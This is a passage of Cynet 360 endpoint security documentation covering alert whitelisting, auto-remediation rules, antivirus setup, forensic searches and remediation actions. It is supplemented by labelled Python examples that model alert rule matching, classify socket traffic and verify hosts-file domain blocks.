Files: A list of the Files that have used the monitored Socket, with additional metadata (risk score incurred, NTFS owner, Running User, Host name, AV score, File type, File Status, Date In, and Last Seen).

Hosts: A list of the Hosts that have used the Socket, with Host metadata (Risk score, Last scan date, Host IP, OS Version, number of Processes running, number of logged-in Users, and number of current connections).

Users: A list of the Users that have used the Socket, with User account metadata (User Name, Risk level, Account Locked, Account Disabled, Running files run by this User, Password age, Last login, First date seen in the Network, and Last date seen).

Finding and Managing Alerts

When an alert is generated, Cynet offers Operators options for Whitelisting or Remediation.

Creating Alert Whitelist Profiles

Cynet 360 enables you to list applications and parameters that are authorized to run in the User’s environment. Cynet does not generate alerts for anything that is whitelisted.

There are two ways to create alert whitelist profiles:

  1. From the Alert: Create whitelisting profiles directly from the displayed alert. This enables Operators to:
     • Name and populate whitelist profiles by extracting available data from the Alert
     • Filter the whitelisting options to match the alert type
     • Add the Whitelist to the Audit
  2. From the Whitelisting tab: Create whitelisting profiles manually from the Whitelisting tab. This enables Operators to create profiles before the activity appears in an alert.

Creating a Whitelist Profile from an Alert

To create a whitelist rule from an alert:

  1. From the alert list on the Alert, Forensic, or Actions page, select the alert.
  2. Click Action.
  3. Select the Whitelisting tab.
  4. In the Profile Name field, enter a descriptive name.
  5. Under Whitelisted by, select the relevant options.
  6. Under Whitelist for, select the relevant options.
  7. Click Create Profile.


Creating an Alert Whitelist Profile from the Whitelist Tab

The Whitelisting tab on the Settings menu enables Operators to create rules that exclude specific values from the detection and remediation mechanism. Examples of these values are:

Files

Users

Hashes

IP Addresses

To configure a Whitelist Rule:

  1. From the Settings page, select the Whitelisting tab.
  2. Click Create.
  3. Enter the profile name.
  4. Select the alert to whitelist and the type of alert on which the exclusion will be based.

Note

When you create a rule, the excluded values apply across all Cynet agents on the network, unless you scope the rule to a specific scan group or host (see the optional step below).

  5. Enter the value according to the type of information selected.
  6. Click +.

Cynet 360 implements the Whitelist Rule.

Optional: The Whitelist can also be scoped to a specific scan group or host.

Notes

Once the Whitelist rule is added, alerts that match the rule are no longer displayed.

“All Alerts” under “Applied on alert” means that the Whitelist is applied to every alert.

Automatically Remediate Alerts

The Auto Remediation page enables the Operator to manage rules that let Cynet 360 automatically perform remediation actions when an alert is generated. You can configure these rules to match alerts based on a number of factors. Cynet 360 takes remediation action mitigating the threat.

There are two ways to create Auto Remediation rules, using the Actions menu (as described below) and using the Alerts menu. For instructions on how to do so using the Alerts menu, see the Zendesk article, “Recommended Auto Remediation Rules”.

To access the Auto Remediation page, click Actions>Auto Remediation.

Column: Description
Name: The name of the Auto Remediation rule.
Description: The description of the Auto Remediation rule.
Remediation: The remediation action taken when this rule is matched. To filter the list by remediation action, select an option from the drop-down menu.
Priority: The order in which the Auto Remediation rules are processed.
Date In: The date and time when the Auto Remediation rule was created.
Is Enabled: Whether the rule is enabled. Select an option from the drop-down menu to show only enabled rules, only disabled rules, or all rules.

Creating Auto Remediation Rules

To create a new Auto Remediation rule, click Create Rule.

The Auto Remediation rule creation menu opens.

Configuring General Parameters

You can configure the following general parameters:

Parameter: Description
Rule Name: Enter an alias for the rule.
Description: Enter a description for the rule.
Priority: Enter a number from 1 to 1000. As with firewall rules, the priority decides which rule executes when two Auto Remediation rules match the same alert. The lower the number, the higher the priority.

Matching

You can create an auto-remediation rule that matches alerts by alert name, host group, and severity.

The matching fields are as follows:

Parameter: Description
Alert Name: Enter a regular expression (RegExp) to match the name of the alert. This enables one rule to match multiple alerts whose names follow a pattern. To match all alert names, use the regular expression (.*)
Host Groups: To match the host in a generated alert, select host groups from the drop-down menu. When the host in the alert belongs to a selected host group, a match is found.

To match all Host Groups, select all the checkboxes.

Alert Severity: Select the severities to match. When the severity of an alert is one you have selected, a match is found.
Advanced Matching

You can also create auto-remediation rules that match specific Files, Users, Networks, and Hosts.

The fields required for Advanced Matching are as follows:

Parameter: Description
File: To restrict the rule to a specific file, enter a File Hash or File Name.

To match any File in an alert, leave this field blank.

User: To restrict the rule to a specific user, enter a User Name.

To match any User in an alert, leave this field blank.

Network: To restrict the rule to a specific network entity, enter an IP address, Domain, or URL.

To match any Network criteria in an alert, leave this field blank.

Hosts to Match

To restrict the rule to specific Hosts, add a Host match.

To add a new Host match:

  1. Click Hosts to Match.
  2. Click Add New Match.
  3. In the Group Name field, enter an alias for the Host match entry.
  4. In the Hosts to Match field, enter a regular expression to match the Host Name. This enables matching of multiple Hosts whose names follow a pattern. To match all Host names, use the regular expression ( .* ).
  5. In the Selected OS field, select an operating system from the drop-down menu to match on operating system. Operating systems in the list are taken from scanned Hosts. To match all operating systems, select *ALL* from the drop-down menu.

To edit an existing Host match entry:

  1. Click Hosts to Match.
  2. Click Edit Match.

Note

The Group Name field is not functional when editing an existing Host match entry.

  3. In the Hosts to Match field, enter a regular expression to match the Host Name. This enables matching of multiple Hosts whose names follow a pattern. To match all Host names, use the regular expression ( .* ).
  4. In the Selected OS field, select an operating system from the drop-down menu to match on operating system. Operating systems in the list are taken from scanned Hosts. To match all operating systems, select *ALL* from the drop-down menu.

Actions

You can select the type of remediation you want to use. You can also decide what actions to take when a match is found.

Remediation Type

You can select the type of remediation from the drop-down menu.

The available options are:

File remediation

Host remediation

User remediation

Network remediation

Action

For each type of remediation selected, you can select an associated action from the drop-down menus.

The options for File Remediation Actions are:

Quarantine File

Delete File

Kill Process

MyRem

The options for Host Remediation Actions are:

Restart Machine

Shutdown Machine

Disable All Nics

Run Command

The option for User Remediation Action is:

Disable User

The options for Network Remediation Actions are:

Block Traffic

DNS Remediation

When you have made all the necessary configuration changes for the Auto Remediation Rule, click Save. The new rule appears in the Auto Remediation dashboard.

Cynet Recommendations for Creating Rules

For files:

For alerts that contain “Adware”, set a “Kill Process” rule scoped to workstation scanning groups only

For alerts that contain “Worm”, set a rule to quarantine the file

For alerts that contain “Backdoor”, set a rule to quarantine the file

For networks:

For alerts that contain “Phishing site”, set a rule to “Block URL”

For alerts that contain “Malware Distribution” or “Compromised Website”, set a rule to “Block IP”

Note

Rules created for networks are applied on the local machine and not at the DNS level.
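As an added illustration, not Cynet’s own code, the following Python models how the whitelist profiles described under “Creating Alert Whitelist Profiles” and the Auto Remediation matching and priority parameters described above combine when an alert arrives: a matching whitelist profile suppresses the alert, otherwise the matching rule with the lowest priority number acts. The Alert, WhitelistProfile and RemediationRule classes, their field names and the sample alerts are assumptions for this example; the rules encode the recommendations above. The last two samples show the caveat with name-based whitelisting: on the scoped host, any file called legacy.exe is suppressed whatever its hash, while the hash-based profile still matches after the file is renamed.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Alert:
    name: str
    severity: str            # "High", "Medium" or "Low"
    host: str
    host_group: str          # scan group the host belongs to
    os: str
    file_name: str = ""
    file_sha256: str = ""
    user: str = ""
    remote_ip: str = ""

@dataclass(frozen=True)
class WhitelistProfile:
    """'Whitelist by' values (hash, file name, user, IP); 'Whitelist for' an optional host scope."""
    name: str
    applied_on_alert: str = "All Alerts"   # one alert name, or "All Alerts"
    hashes: frozenset = frozenset()
    file_names: frozenset = frozenset()
    users: frozenset = frozenset()
    ips: frozenset = frozenset()
    hosts: frozenset = frozenset()         # empty = applies on every Cynet agent

    def matches(self, a: Alert) -> bool:
        if self.applied_on_alert != "All Alerts" and a.name != self.applied_on_alert:
            return False
        if self.hosts and a.host not in self.hosts:
            return False
        return (a.file_sha256 in self.hashes or a.file_name in self.file_names
                or a.user in self.users or a.remote_ip in self.ips)

@dataclass(frozen=True)
class RemediationRule:
    name: str
    priority: int                 # 1..1000; the lowest number wins when several rules match
    alert_name_re: str            # regular expression over the alert name
    severities: frozenset
    host_groups: frozenset
    action: str
    file: str = ""                # hash or file name; "" = any file
    user: str = ""                # "" = any user
    network: str = ""             # IP, domain or URL; "" = any
    hosts_re: str = ".*"          # Hosts to Match regular expression
    selected_os: str = "*ALL*"

    def matches(self, a: Alert) -> bool:
        # Whether Cynet anchors its patterns is not stated; the recommended ".*X.*" and
        # "(.*)" forms behave the same under search and full match, so search is used.
        return (re.search(self.alert_name_re, a.name) is not None
                and a.severity in self.severities
                and a.host_group in self.host_groups
                and (not self.file or self.file in (a.file_name, a.file_sha256))
                and (not self.user or self.user == a.user)
                and (not self.network or self.network == a.remote_ip)
                and re.search(self.hosts_re, a.host) is not None
                and self.selected_os in ("*ALL*", a.os))

def decide(alert, profiles, rules):
    """A matching whitelist profile suppresses the alert; otherwise the matching
    rule with the lowest priority number acts; otherwise the alert just opens."""
    for p in profiles:
        if p.matches(alert):
            return ("whitelisted", p.name, None)
    for r in sorted(rules, key=lambda r: r.priority):
        if r.matches(alert):
            return ("remediate", r.name, r.action)
    return ("open", None, None)

ALL_SEV = frozenset({"High", "Medium", "Low"})
ALL_GROUPS = frozenset({"Workstations", "Servers"})

# Cynet's recommendations above as rules, plus a low-priority catch-all for High alerts.
RULES = [
    RemediationRule("adware-kill", 10, r".*Adware.*", ALL_SEV, frozenset({"Workstations"}), "Kill Process"),
    RemediationRule("worm-quarantine", 20, r".*Worm.*", ALL_SEV, ALL_GROUPS, "Quarantine File"),
    RemediationRule("phishing-block", 30, r".*Phishing site.*", ALL_SEV, ALL_GROUPS, "Block URL"),
    RemediationRule("high-catch-all", 1000, r"(.*)", frozenset({"High"}), ALL_GROUPS, "Quarantine File"),
]

# One profile keyed on a file hash, one keyed only on a file name and scoped to a single host.
PROFILES = [
    WhitelistProfile("signed-updater-by-hash", hashes=frozenset({"b1" * 32})),
    WhitelistProfile("legacy-tool-by-name", file_names=frozenset({"legacy.exe"}), hosts=frozenset({"WS-07"})),
]

# Constructed sample alerts, not real detections.
SAMPLES = {
    "adware_on_server":      Alert("Adware detected", "Medium", "SRV-01", "Servers", "Windows Server 2016", "toolbar.exe", "aa" * 32),
    "adware_on_workstation": Alert("Adware detected", "Medium", "WS-03", "Workstations", "Windows 10", "toolbar.exe", "aa" * 32),
    "worm_high":             Alert("Worm activity", "High", "WS-03", "Workstations", "Windows 10", "svc.exe", "cc" * 32),
    "renamed_updater":       Alert("Adware detected", "High", "WS-03", "Workstations", "Windows 10", "not_updater.exe", "b1" * 32),
    "backdoor_named_legacy": Alert("Backdoor found", "High", "WS-07", "Workstations", "Windows 10", "legacy.exe", "dd" * 32),
    "backdoor_other_host":   Alert("Backdoor found", "High", "WS-08", "Workstations", "Windows 10", "legacy.exe", "dd" * 32),
}

def run_samples():
    """Decision for every sample alert, keyed by sample name."""
    return {k: decide(a, PROFILES, RULES) for k, a in SAMPLES.items()}
```

Run `run_samples()` to see each decision. The Adware alert on the server is left open because the Kill Process rule is scoped to workstations and the catch-all only takes High alerts; the Worm alert goes to the Worm rule rather than the catch-all because 20 beats 1000; and the Backdoor on WS-07 never reaches any rule because the name-based profile suppresses it first, which is why whitelisting by hash is the safer choice whenever the page’s “Hashes” option applies.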

Editing Auto Remediation Rules

To edit an Auto Remediation rule, click the Rule Name.

The Auto Remediation editing menu opens.

Edit the rule using the same procedure as in “Creating Auto Remediation Rules”.

Deleting Auto Remediation Rules

To delete an Auto Remediation rule:

  1. Select the rule in the Auto Remediation rule list.
  2. Click Delete.
  3. Click Confirm Delete.

NextGen AV

Cynet 360 has traditionally focused on protecting your organization from new and advanced cyber threats. In this version of Cynet 360, the new antivirus module further reduces the attack surfaces in your environment by also protecting you from known malware. Everything is done under one system with no requirement for an additional external antivirus program.

Note

NextGen AV works with Windows 8 and above.

Activating NextGen AV

To activate NextGen AV:

  1. Make sure that TCP port 5443 from the endpoint to the server is open.
  2. Install the latest version of the CynetEPS detection engine on the endpoints in your environment.
     For instructions, see section 6.2 “Installing the CynetEPS Detection Engine”.
  3. In Cynet 360, enable the Cynet antivirus engines.
     For instructions, see section 6.3 “Enabling Cynet 360 NGAV”.

Installing the CynetEPS Detection Engine

Your Cynet support representative will provide the CynetEPS installation file. Install it on every endpoint in your environment.

Enabling Cynet 360 NGAV

To enable Cynet 360 antivirus:

  1. On the main menu, click Settings.
  2. In the Scan Groups tab, scroll down to the Antivirus section and select Antivirus.
  3. In the Antivirus Engines section, Cynet Antivirus Engines and Antivirus Real Time Engine must be selected. If more antivirus engines are listed, you can select them too.

     Note: You must select at least one antivirus engine.
  4. (Optional) Select Windows Defender to enable Cynet to work with Windows Defender.
     • Make sure that Windows Defender Real Time is selected.
     • It is not necessary to select Keep Windows Defender Service Running.
  5. Select the requested Antivirus option:
     • Alert Only: enables alert mode only. When an alert is triggered, a dialog box opens on the endpoint.
     • Rename File: changes the .exe extension to .Cynet so that the User knows that the file is malicious.
     • Delete File: deletes the file.
  6. Click Save.

Understanding Forensics

Performing Favorite Searches

The Forensic page is divided into five distinct sub-sections: Files, Hosts, Users, Domains, and Sockets. Each sub-section provides inventories for all data collected by Cynet 360. Each page of the Forensic section has the same basic layout:

Label (Parameter): Description
A (Sub Menu): Contains links to the inventories of all Files, Hosts, Users, Domains, and Network sockets observed by the system.
B (Favorite Searches): Predefined searches for quickly searching within the inventories.
C (Advanced Search): Enables the Operator to search within inventories on any of the available metadata fields, or to change the fields displayed in the Inventory List.
D (Actions): Enables the Operator to export inventories to Excel and/or to take Remediation Action.
E (Quick Filter): Enables the Operator to quickly filter inventories by metadata and indicators such as file name, risk level, host name, and IP address.
F (Inventory List): Lists every object that matches the filter criteria set in the Quick Filter Bar. To view more information and details about an object, click the object name.
G (Top Results): Shows objects with high risk levels and other risky items.

File Favorite Searches

The Files page contains eight default favorite searches. The searches cannot be edited or deleted. They provide a quick and easy way to search for files based on the following parameters:

Parameter: Description
Internal Com: Files that have network communication to an internal IP address.
External Com: Files that have network communication to an external IP address.
Unique in Org: Files that are unique within your organization and exist only once.
DLL: Files with the .dll extension.
EXE: Files with the .exe extension.
No GUI: Files that are running in a hidden window.
Detected by Security Intel: Files that have been identified using Cynet’s security intelligence feeds.
Start Up: Files that have made themselves persistent on the endpoint and execute when the computer starts up.
Test (custom search): When performing an Advanced Search, you can save your own search by clicking the star. It is saved under Favorite Searches with the name you give it (for example, Test).

Host Favorite Searches

The Hosts page contains three default favorites that make it quick and easy to search for hosts. The default favorite searches cannot be edited or deleted.

Parameter: Description
High Risk: Hosts with a high risk level.
Internal Com: Hosts that have network communication to an internal IP address.
External Com: Hosts that have network communication to an external IP address.
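The page does not say how Cynet decides whether a remote address is internal or external. The following added Python example (not Cynet’s implementation) shows one reasonable definition of the Internal Com / External Com searches for both Files and Hosts, run over constructed socket records shaped like the Sockets inventory columns (Host Name, Local IP, Local Port, Remote IP, Remote Port) plus the owning file. The ranges treated as internal (RFC 1918, carrier-grade NAT, loopback, link-local and their IPv6 counterparts), the record layout and the file and host names are assumptions for this example.

```python
import ipaddress
from collections import defaultdict

# Assumed "internal" ranges; the page does not say how Cynet draws this line.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "100.64.0.0/10",                                   # carrier-grade NAT, assumed on-net
    "127.0.0.0/8", "169.254.0.0/16",                   # loopback, link-local
    "::1/128", "fc00::/7", "fe80::/10",                # IPv6 loopback, ULA, link-local
)]

def is_internal(ip_str: str) -> bool:
    """True if the address falls in one of the internal ranges above."""
    ip = ipaddress.ip_address(ip_str.strip("[]"))
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped            # ::ffff:10.1.2.3 is an IPv4 peer in disguise
    return any(ip in net for net in INTERNAL_NETS)

# Constructed socket records (not captured data) shaped like the Sockets inventory
# columns Host Name / Local IP / Local Port / Remote IP / Remote Port, plus the file.
SOCKETS = [
    {"host": "WS-03",  "file": "outlook.exe",  "local_ip": "10.20.0.15",  "local_port": 51044, "remote_ip": "10.20.0.5",        "remote_port": 445},
    {"host": "WS-03",  "file": "outlook.exe",  "local_ip": "10.20.0.15",  "local_port": 51045, "remote_ip": "52.96.0.10",       "remote_port": 443},
    {"host": "WS-03",  "file": "svc.exe",      "local_ip": "10.20.0.15",  "local_port": 51090, "remote_ip": "203.0.113.7",      "remote_port": 4444},
    {"host": "SRV-01", "file": "sqlservr.exe", "local_ip": "10.20.0.5",   "local_port": 1433,  "remote_ip": "10.20.0.15",       "remote_port": 51044},
    {"host": "SRV-01", "file": "agent.exe",    "local_ip": "10.20.0.5",   "local_port": 49200, "remote_ip": "::ffff:10.20.0.9", "remote_port": 5443},
    {"host": "WS-07",  "file": "updater.exe",  "local_ip": "169.254.3.1", "local_port": 49500, "remote_ip": "100.70.1.1",       "remote_port": 443},
]

def classify(sockets):
    """Files and Hosts per favorite search:
    {"Internal Com": {"files": set, "hosts": set}, "External Com": {...}}."""
    out = {"Internal Com": defaultdict(set), "External Com": defaultdict(set)}
    for s in sockets:
        bucket = "Internal Com" if is_internal(s["remote_ip"]) else "External Com"
        out[bucket]["files"].add(s["file"])
        out[bucket]["hosts"].add(s["host"])
    return {k: dict(v) for k, v in out.items()}

def external_only_files(sockets):
    """Files seen talking only to external addresses: a first cut at beaconing candidates."""
    c = classify(sockets)
    return c["External Com"].get("files", set()) - c["Internal Com"].get("files", set())
```

A file can appear in both searches (outlook.exe above talks to the file server and to a public mail service), so the two searches are not complementary; `external_only_files` is the narrower question an analyst usually wants, and the IPv4-mapped and carrier-grade NAT cases are where a naive string check on the Remote IP column would misclassify.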

User Favorite Searches

The Users page contains the following default favorites that make it quick and easy to search for Users. The default favorite searches cannot be edited or deleted.

Parameter: Description
High Risk: User accounts with a high risk level.
Locked: User accounts that are locked out.
Run Risky Files: User accounts running high risk files.
Old Password Age: User accounts with an old password, based on the last time the password was changed.

Domain Favorite Searches

The Domains page contains two default favorites that make it quick and easy to search for domains. The default favorite searches cannot be edited or deleted. They provide a quick and easy way to search for domains based on:

Parameter: Description
High Risk: Domains with a high risk level.
Detected by Security Intel: Domains identified using Cynet’s security intelligence feeds.

Socket Favorite Searches

The Socket page contains one default favorite that makes it quick and easy to search for sockets. The default favorite search cannot be edited or deleted.

Parameter: Description
High Risk: Network Sockets with a high risk level.

Taking Actions

This section contains information on all available actions in Cynet.

Actions can be run from the actual Alert, or from the top right of the Forensics and Alert pages.

Auto Remediation can be performed as well. For more information, see “Auto-Remediation Actions” below.

Taking Actions on an Alert

Alert actions can be used to change an alert status or to perform a remediation action on files, hosts, or Users.

To open the Alert Actions menu:

  1. On the Alerts Dashboard, select one or more alerts.
  2. Click the Actions button.

A menu opens indicating which alerts are currently selected.

You can:

A: Change the Alert Status to Open, Close, or Ignore

B: Add Comments. See “Add Comments”

C: Create a whitelist profile. See “Creating a Whitelist Profile from an Alert”

D: Perform additional Analysis actions. See “Analysis Action”

E: Perform Remediation actions. See “Taking Remediation Actions”

F: Create a new Auto-Remediation rule based on the alert details. See “Auto-Remediation Actions”

Note

Only actionable tabs appear in the Action window, according to the selected alerts.

Domain Actions

The Actions icon enables the Operator to enter the IP/URL of an external address and then perform a DNS remediation on that address for the entire organization.

Block Traffic

This action blocks specific traffic to and from the selected hosts.

DNS Remediation

This action redirects all traffic to the domain to a specified IP address. A new zone in the internal DNS server is created to resolve this domain to the specified IP address. Any Hosts that attempt to resolve the domain in the network are given the specified IP address from the internal DNS server. Traffic is prevented from reaching the actual domain’s IP address.

Hosts Actions

The Actions icon enables the Operator to run the following types of actions on all the Hosts in the organization:

Run Command

This action executes the specified commands on all the Hosts. The output is captured and presented in the console. If the output has multiple lines, it is preserved in a text file format.

Run Script

This action enables a specified file to be run on all Hosts.

To run a script on all Hosts:

  1. Select a file from the local computer.
  2. Upload the file to the Cynet server.
  3. The Cynet server deploys the file to the Hosts for execution.

Add Comments

This action inserts a comment to a single alert or to multiple selected alerts simultaneously.

To add a comment to one or more alerts:

  1. From the Alert page, select the alert or alerts.
  2. Click Actions.
  3. Click Add Comments.
  4. In the Add Comment window, enter your comment.
  5. Click Add.

Analysis Action

Operators can take analysis actions on files scanned by Cynet 360.

To take an analysis action, open the Actions menu and select an action from the Analysis tab.

The following Analysis Actions are available:

Analysis Action: Description
Send to SOC: Sends the selected file(s) to the Cynet SOC for deep inspection and analysis.
Send to Analysis: Sends the selected file(s) to the Cynet SSE Sandbox for analysis. This requires that the Cynet SSE sandbox is configured.
Verify File: Verifies that the selected file(s) still exist(s) on the Host(s).
Get Memory Strings: Dumps the strings in memory allocated by the selected file(s).
Pull File: Pulls the selected file occurrence from the Host. This action is performed by selecting a specific file occurrence and therefore targets a specified Host. Once pulled, the sample is available for download from the File Actions page. The sample has its extension stripped and is renamed to the file’s SHA256 hash. This action is limited to files of 100 MB or less.
Deep Scan: Begins a deep scan of the selected file occurrence on the Host. This action is performed by selecting a specific file occurrence and requires a specified instance of a process on a Host.

Deep Scans

Cynet uses Deep Scans to monitor a specific file on an endpoint. A Deep Scan monitors the behaviors of a process for an extended period of time. This is a hybrid analysis combining normal scanning and sandboxing, where the deep scan analysis takes place on the endpoint itself. Deep Scans are initiated manually.

Initiating a Deep Scan

To initiate a Deep Scan of a file:

  1. In Forensic, navigate to the File Details Page.
  2. Click the Occurrences tab of the file to be scanned.

Note

Deep Scans can only be performed on one file per host at a time. After the deep scan has completed on the host, another deep scan can be performed on that host.

Only executable files can be added for Deep Scanning.

  3. On the file’s Occurrences tab, select the file occurrence to be scanned.
  4. Click Actions.
  5. In the Actions menu, click Deep Scan.

Note

When you initiate a Deep Scan on a process occurrence, you are prompted to acknowledge that additional files (such as child processes) may be monitored as part of the scan.

Any currently-running deep scans on this host are terminated.

While the Deep Scan is running, you can view the current status of the scan. To view the current status of the Deep Scan, click the Deep Scans tab on the File Actions page.

When the Deep Scan is complete, the results can be viewed in the Deep Scan tab of the File Details Page of the specified file.

There are two options to view results: Advanced and Normal.

Advanced View shows additional information such as Hostname, Scope of the event or object, First Seen, and Last Seen timestamps.

Whitelisting Actions

The Whitelisting tab enables you to create whitelist profiles. Select alert activities such as files, processes, and commands, or the hosts, servers, and endpoints displayed in the Whitelisting tab to ensure that future alerts are disabled for the selection.

For more information, see “Creating an Alert Whitelist Profile from the Whitelist Tab ”.


Parameter: Description
Profile Name: User-given name of the whitelist profile
Whitelist by: Lists the components of the alert by activity
Whitelist for: Lists the components of the alert by affected recipients

Taking Remediation Actions

You can take Remediation Actions on objects scanned by Cynet 360.

To take a Remediation Action:

  1. Navigate to Forensic.
  2. Select the object on which you want to take action.
  3. Click the Actions icon.
  4. Select the Remediation tab.
  5. Select the Remediation Action you want to perform.

The Remediation tab has a sub-menu that enables navigation between the Remediation Actions available in the system.

File Remediation Actions

Cynet can take Remediation Actions on files observed on endpoints in the environment. File Remediation Actions can be taken from any Actions menu. The results of a File Remediation Action are recorded in the File Actions page.

The following File Remediation Actions are available:

Remediation Action: Description
Delete File: Deletes the selected File from the Host.
Quarantine File: Quarantines the selected file on the host. A list of quarantined files can be found on the File Actions page.
Kill Process: Kills the selected process on the hosts. This action leaves the file intact, only killing the process loaded in memory.

User Remediation Actions

Cynet can take Remediation Actions on Users observed in the environment. User Remediation Actions can be taken from any Actions menu. The results of a User Remediation Action are recorded in the User Actions page.

The following User Remediation Actions are available:

Remediation Action: Description
Enable User: Enables the selected User account if it was disabled.
Disable User: Disables the selected domain or local User account.

Host Remediation Actions

Cynet can take Remediation Actions on Hosts scanned in the environment. Host Remediation Actions can be taken from any Actions menu. The results of a Host Remediation Action are recorded in the Host Actions page.

The following Host Remediation Actions are available:

Remediation Action: Description
Scan: Rescans the selected Host.
Shut Down: Shuts down the selected Host.
Restart: Reboots the selected Host.
Change IP: Changes the IP address of the Host.
Disable All NICs: Disables all Network Interface Cards (NICs) on the selected Host. Using this action prevents any further remote connections to the Host.
Run Command: Executes the specified commands on the selected Host. The output is captured and presented in the console. When the output contains multiple lines, it is preserved in a text file format.
Pull File: Pulls an existing file from the endpoint.
Run Script: Uploads a script and runs it on the endpoint.
Delete Service: Deletes the specified service on the selected Host.
Disable Service: Disables the specified service on the selected Host.
Delete Scheduled Task: Deletes the specified scheduled task on the selected Host.
Disable Scheduled Task: Disables the specified scheduled task on the selected Host.
Isolate: Isolates the endpoint so that it can communicate only with the Cynet server and the Active Directory server.
Un-Isolate: Removes the Host isolation by removing the communication filter.

Domain Remediation Actions

Cynet can take Remediation Actions to block network connections observed in the environment for a specific domain. Domain Remediation Actions can be taken from the Actions menu. The results of a Domain Remediation Action are recorded in the Network Actions page.

The following Domain Remediation Actions are available:

  • Block Traffic – Blocks traffic to specified IP addresses and domains. IP addresses are blocked by modifying the route table on the selected Host so that traffic to these IPs loops back to the localhost address. Domains are blocked by creating an entry in the hosts file on the selected Host so that the domain resolves to the localhost address.
  • DNS Remediation – Redirects all traffic for the domain to a specified IP address. Cynet does this by creating a new zone in the internal DNS server that resolves the domain to the specified IP address. Any Host in the network that attempts to resolve the domain receives the specified IP address from the internal DNS server, so traffic is prevented from reaching the actual domain’s IP address.
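The Block Traffic action above pins domains to the loopback address through the Host's hosts file. The following is an added example (not Cynet's own code) showing how an Operator could verify, from a copy of a Host's hosts file, that every domain expected to be blocked resolves only to loopback and that no legitimate name was accidentally overridden. The hosts-file content and the domain names are constructed for this example.

```python
import ipaddress

# Constructed sample of a Windows hosts file after a Block Traffic action.
# The entries are illustrative; they are not real Cynet output.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#   127.0.0.1       localhost

127.0.0.1  bad-updates.example   # assumed entry written by Block Traffic
127.0.0.1  cdn.bad-updates.example
::1        bad-updates.example
10.0.0.55  intranet.example      # a legitimate, non-block entry
"""

LOOPBACK = {"127.0.0.1", "::1"}


def parse_hosts(text):
    """Return {hostname: set(addresses)} from hosts-file text, ignoring comments."""
    mapping = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop full-line and trailing comments
        if not line:
            continue
        parts = line.split()
        addr, names = parts[0], parts[1:]
        try:
            ipaddress.ip_address(addr)
        except ValueError:
            continue  # skip malformed lines rather than trusting them
        for name in names:
            mapping.setdefault(name.lower(), set()).add(addr)
    return mapping


def check_blocks(text, expected_domains):
    """Classify each expected domain as 'blocked', 'missing', or 'conflicting'.

    blocked     - every hosts entry for the domain points at loopback
    missing     - the domain has no hosts entry at all (the action did not land)
    conflicting - at least one entry points elsewhere, so the block can be
                  bypassed or a legitimate mapping was overwritten
    """
    mapping = parse_hosts(text)
    result = {}
    for domain in expected_domains:
        addrs = mapping.get(domain.lower())
        if not addrs:
            result[domain] = "missing"
        elif addrs <= LOOPBACK:
            result[domain] = "blocked"
        else:
            result[domain] = "conflicting"
    return result


def non_loopback_overrides(text):
    """Names pinned to a non-loopback address: candidates for manual review."""
    return sorted(n for n, a in parse_hosts(text).items() if not a <= LOOPBACK)
```

Running `check_blocks(SAMPLE_HOSTS, [...])` against the list of domains you expect the action to have blocked reports which ones are fully pinned to loopback and which still resolve elsewhere; `non_loopback_overrides` lists every name the file redirects to a real address, which is where an unexpected or stale entry would show up.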

Auto-Remediation Actions

Operators can associate Auto-Remediation Actions to be triggered on Alerts, or create an Auto-Remediation rule on-the-fly.

As detailed in the Automatically Remediate Alerts section, Auto-Remediation is applied only upon strict rule-matching, based on the Alert’s entities (Files, Users, Hosts, or Network).

Within a rule, Auto-Remediation actions can be applied granularly to each aspect of the Alert: Files, Users, Hosts, or Network.

To associate an Auto-Remediation Action to an Alert, or create an Auto-Remediation Action, through the Alerts View:

  • Navigate to Alerts.
  • Select the Alert on which you want to take action.
  • Click .
  • Open the Auto-Remediation tab.
  • To associate an existing Auto-Remediation Rule, select the pre-defined Auto-Remediation Rule you want to associate with the Alert (the Auto-Remediation action may also be available in the “Chosen Alerts” top pane of the Alert expandable right-hand drawer).
  • You can also create a new Auto-Remediation rule in the bottom section of the Alert expandable right-hand drawer by setting the Auto-Remediation rules that control the Auto-Remediation Action to be triggered. For more details, refer to the Automatically Remediate Alerts section.

Actions Page

The Actions page has six subsections. These are Files, Hosts, Users, Network, Playbooks, and Auto Remediation. Each subsection lists actions taken by Cynet 360.

Each page of the Actions section has the same basic layout:

A: The Sub-Menu

The Submenu has tabs for the following interfaces:

  • File Actions
  • Host Actions
  • User Actions
  • Network Actions
  • Playbook Actions
  • Auto Remediation

B: Action Tabs

Some action pages, such as the File Actions page, have Action Tabs providing additional actions to take. These include:

  • Analysis – See “Analysis Action”
  • Deep Scan – See “Deep Scans”
  • Deception Files Actions – See “Deceptions”

Hosts Actions

The Actions icon enables the Operator to run actions on all the Hosts in the organization.

The Actions feature enables the Operator to perform the following types of actions on all the Hosts:

Run Command

This action executes the specified commands on all the Hosts. The output is captured and presented in the console. If the output has multiple lines, it is preserved in a text file format.

Run Script

This action enables a specified file to be run on all Hosts.

To run a script on all Hosts:

  1. Select a file from the local computer.
  2. Upload the file to the Cynet server.

The Cynet server deploys the file to the Hosts for execution.

Add Comments

This action inserts a comment to a single alert or to multiple selected alerts simultaneously.

To add a comment to a single or multiple alerts:

  1. From the Alert page, select the alert or alerts.
  2. Click Actions.
  3. Click Add Comments.
  4. In the Add Comment window, enter your comment.
  5. Click Add.

Running Host Scans

The Scanner page enables Operators to start and stop host scans and to view the status of host scans. They can perform ad hoc scans by clicking the Manual Scans tab.

The Scanner page also enables Operators to perform the following functions:

  • A: Scanner Action Buttons – Enables Operators to perform scan-related actions such as:
    • Start / Stop Scanner – Starts or stops the Scanner service.
    • Restart Scans – Clears all displayed scan history and initiates the scanner service to rescan all Hosts immediately.
    • Export Scan Errors – Exports scan errors to an Excel file.
    • Export Never-Scanned Endpoints – Exports unscanned Hosts to an Excel file.
    • Disable/Enable Auto Refresh – Disables or enables auto-refreshing of the Scanned Endpoints table data.
    • Reload Table Data – Refreshes the Scanned Endpoints table with the latest scan data received from the endpoints.
  • B: Quick Filter – Enables Operators to quickly filter scanned Hosts by IP/Host, Scan Group, Scan, Start Scan, End, Status, Status Distribution, or details.
